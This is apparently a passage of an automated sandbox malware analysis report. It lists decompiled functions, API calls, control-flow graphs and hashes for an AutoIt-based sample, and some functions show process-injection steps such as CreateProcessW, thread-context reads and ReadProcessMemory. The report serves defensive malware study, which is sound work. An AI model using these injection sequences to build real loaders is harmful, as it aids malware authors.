2062->2039 2071 c301e5-c301ef 2063->2071 2068 c3030a-c30310 2064->2068 2069 c302ff-c30308 2064->2069 2067 c30313 2065->2067 2067->2043 2068->2067 2069->2067 2072 c30222-c30236 call c30fb0 2071->2072 2073 c301f1-c30220 call c311a0 2071->2073 2078 c3023a-c3023e 2072->2078 2079 c30238 2072->2079 2073->2071 2081 c30240-c30244 CloseHandle 2078->2081 2082 c3024a-c3024e 2078->2082 2079->2039 2081->2082 2083 c30250-c3025b VirtualFree 2082->2083 2084 c3025e-c30267 2082->2084 2083->2084 2084->2034 2084->2039
                    APIs
                    • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00C30111
                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C30337
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateFileFreeVirtual
                    • String ID:
                    • API String ID: 204039940-0
                    • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction ID: 62d77fbd936fb554c1d5b7edd99eab5c62ced8f1892aaa158db36e193f15ff90
                    • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                    • Instruction Fuzzy Hash: 23A11671E14209EBDB14CFA4C8A8BEEBBB5BF48304F208159E515BB281C7759A81DF94
                    Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2162 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                    • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                    • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                    • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                    • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                    • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                    Function 00C2FE00 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 149fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2515 c2fe00-c2ff40 call c2da50 call c2fcf0 CreateFileW 2522 c2ff42 2515->2522 2523 c2ff47-c2ff57 2515->2523 2524 c2fff7-c2fffc 2522->2524 2526 c2ff59 2523->2526 2527 c2ff5e-c2ff78 VirtualAlloc 2523->2527 2526->2524 2528 c2ff7a 2527->2528 2529 c2ff7c-c2ff93 ReadFile 2527->2529 2528->2524 2530 c2ff97-c2ffd1 call c2fd30 call c2ecf0 2529->2530 2531 c2ff95 2529->2531 2536 c2ffd3-c2ffe8 call c2fd80 2530->2536 2537 c2ffed-c2fff5 ExitProcess 2530->2537 2531->2524 2536->2537 2537->2524
                    APIs
                      • Part of subcall function 00C2FCF0: Sleep.KERNEL32(000001F4), ref: 00C2FD01
                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00C2FF36
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CreateFileSleep
                    • String ID: BBVT4SOA7G3QLBDTZJ8
                    • API String ID: 2694422964-431180202
                    • Opcode ID: 30bf9d12127ed97fe2fdaad0a8953b629951f976a4ae0664a456366822bfb3ce
                    • Instruction ID: a140fccac2ea9603d181151e0ff80e0633859db9a9944837bd7b0270b933e385
                    • Opcode Fuzzy Hash: 30bf9d12127ed97fe2fdaad0a8953b629951f976a4ae0664a456366822bfb3ce
                    • Instruction Fuzzy Hash: 0651A131D0425CEAEF11DBE4D844BEEBBB5AF19700F1041A8E249BB2C1D7BA0B45CB65
                    Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 2539 40407c-404092 2540 404098-4040ad call 407a16 2539->2540 2541 40416f-404173 2539->2541 2544 4040b3-4040d3 call 407bcc 2540->2544 2545 43d3c8-43d3d7 LoadStringW 2540->2545 2548 43d3e2-43d3fa call 407b2e call 406fe3 2544->2548 2550 4040d9-4040dd 2544->2550 2545->2548 2557 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 2548->2557 2561 43d400-43d41e call 407cab call 406fe3 call 407cab 2548->2561 2552 4040e3-4040e8 call 407b2e 2550->2552 2553 404174-40417d call 408047 2550->2553 2552->2557 2553->2557 2557->2541 2561->2557
                    APIs
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                    • _memset.LIBCMT ref: 004040FC
                    • _wcscpy.LIBCMT ref: 00404150
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                    • String ID: Line:
                    • API String ID: 3942752672-1585850449
                    • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                    • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                    • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                    • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                    Function 00C2ECF0 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessW.KERNEL32(?,00000000), ref: 00C2F4AB
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00C2F541
                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00C2F563
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062769106.0000000000C2D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c2d000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction ID: cfea5e2c86ff0a2f488caf8104e996a3e3b8d8562d7ba3afdccd4ed1148ec2a8
                    • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                    • Instruction Fuzzy Hash: AB620B30A14258DBEB24CFA4D850BDEB372EF58700F1091A9E11DEB790E7799E81CB59
                    Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                    • String ID:
                    • API String ID: 1559183368-0
                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                    • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                    • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                    Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                    • _free.LIBCMT ref: 0043E263
                    • _free.LIBCMT ref: 0043E2AA
                      • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _free$CurrentDirectoryLibraryLoad
                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                    • API String ID: 2861923089-1757145024
                    • Opcode ID: 35533af6241bec56275aca290b9ff8629e672cfd84973d89e9ca4a20657c9253
                    • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                    • Opcode Fuzzy Hash: 35533af6241bec56275aca290b9ff8629e672cfd84973d89e9ca4a20657c9253
                    • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                    Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                    • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: Control Panel\Mouse
                    • API String ID: 3677997916-824357125
                    • Opcode ID: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                    • Instruction ID: b1ff216ba3ee978410a1c1c06e663b0c2c98cd46aaa17f39490786bf8a1b1252
                    • Opcode Fuzzy Hash: fddb709fe4a1b7e3bb6eda9662e0779279b58f522ad42de317fca39f37a0c6b5
                    • Instruction Fuzzy Hash: 84114871510208BFDB20CF64DC409AFBBBCEF45741F10486AE805E7250D6729E449768
                    Function 0046955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
                      • Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837
                    • _free.LIBCMT ref: 004696A2
                    • _free.LIBCMT ref: 004696A9
                    • _free.LIBCMT ref: 00469714
                      • Part of subcall function 00422D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00429A24), ref: 00422D69
                      • Part of subcall function 00422D55: GetLastError.KERNEL32(00000000,?,00429A24), ref: 00422D7B
                    • _free.LIBCMT ref: 0046971C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                    • String ID:
                    • API String ID: 1552873950-0
                    • Opcode ID: e6309f62c52c5f3975a2c5ad0b5210de68619ff9c4455ff3d11a5af61bc3d5c8
                    • Instruction ID: ca2eec8eb8578c2366e6fbf42eaf411172dd757ca1b938988fe54b4571807f9b
                    • Opcode Fuzzy Hash: e6309f62c52c5f3975a2c5ad0b5210de68619ff9c4455ff3d11a5af61bc3d5c8
                    • Instruction Fuzzy Hash: 88515EB1904219ABDF249F65DC81A9EBB79EF88304F1044AEF209A3241DB755E90CF59
                    Function 0042470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                    • String ID:
                    • API String ID: 2782032738-0
                    • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                    • Instruction ID: 7e2b6cc7ad03bd9c76499a1e37937a2f988b0f8539bc111f38111bac958280d8
                    • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                    • Instruction Fuzzy Hash: 9341D434B006659BDB189F69E88096F7BA5EFC2364B50813FE82587640DB78DD418B48
                    Function 00AEB180 Relevance: 6.1, APIs: 4, Instructions: 95fileCOMMON
                    Download Yara Rule
                    APIs
                    • SetFilePointerEx.KERNEL32 ref: 00AEB2BA
                    • WriteFile.KERNEL32(?,?,00000004,?,00000000), ref: 00AEB2E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2062108928.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_ae0000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: File$PointerWrite
                    • String ID:
                    • API String ID: 539440098-0
                    • Opcode ID: 27ca2344b8c5bdb51cad0b38c98f0eb6fb186ceee049767ba69641deff298474
                    • Instruction ID: 4da0cda3189752a5cbcb8e9bbee964a47ad8ca4c87b85c223dd89df4526afc72
                    • Opcode Fuzzy Hash: 27ca2344b8c5bdb51cad0b38c98f0eb6fb186ceee049767ba69641deff298474
                    • Instruction Fuzzy Hash: AD31B27042C3C1AED7118B67881D76BBFE06F92725F48894DE5D49A691D3B488089773
                    Function 00404C70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID: AU3!P/I$EA06
                    • API String ID: 4104443479-1914660620
                    • Opcode ID: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                    • Instruction ID: ff6ab1fe0fa27ea81cbcababf34b5742e04188ff143208347500ec0318cc5285
                    • Opcode Fuzzy Hash: 8014d3fb356ffbf6754ed2c01cea3d798000f8d72259ce0527afa311c47bbb91
                    • Instruction Fuzzy Hash: F1418AB1A0415867DB219B6498517BF7BA19FC5304F28407BEE82BB3C2D63C5D4583AA
                    Function 00407285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 0043EA39
                    • GetOpenFileNameW.COMDLG32(?), ref: 0043EA83
                      • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
                      • Part of subcall function 00420791: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Name$Path$FileFullLongOpen_memset
                    • String ID: X
                    • API String ID: 3777226403-3081909835
                    • Opcode ID: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                    • Instruction ID: baa1e7331fae4d359aac7897d23b5e8ce5a65ce190648e6f88e75d23560a4c0c
                    • Opcode Fuzzy Hash: f7a2dfced1c7fac4da1122c6cfde17308801e93c3a8658db5658365851755d62
                    • Instruction Fuzzy Hash: 4421A471A102589BCB41DF95D845BDE7BF8AF49314F00806FE508B7281DBB85989CFAA
                    Function 00468D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __fread_nolock_memmove
                    • String ID: EA06
                    • API String ID: 1988441806-3962188686
                    • Opcode ID: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                    • Instruction ID: 3cd15271acb3b06ac884f373c06a49f445b450121f82016c471601618c020999
                    • Opcode Fuzzy Hash: 12b9eb2746c946ee24d761f12b33ae587f64773302ff2959e1666c5e9a364bcc
                    • Instruction Fuzzy Hash: 8F01F9719042287EDB18CAA9D816EFE7BFCDB11301F00459FF552D2181E878E6048764
                    Function 004698E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000104,?), ref: 004698F8
                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0046990F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Temp$FileNamePath
                    • String ID: aut
                    • API String ID: 3285503233-3010740371
                    • Opcode ID: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                    • Instruction ID: d76eb4abf93f0e171a782776cb2de2514a1bc3ee8d101bd4a6c1c3d5b9ef8161
                    • Opcode Fuzzy Hash: d3e801ab242beb6fec4b4f89e1aaff04be832202f3ef9fc21f6b566375e79959
                    • Instruction Fuzzy Hash: D0D05E7954030DABDB50ABA0DC0EFDA773CE704700F0006F5BA54D10A1EAB1A5988BA9
                    Function 0047CADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
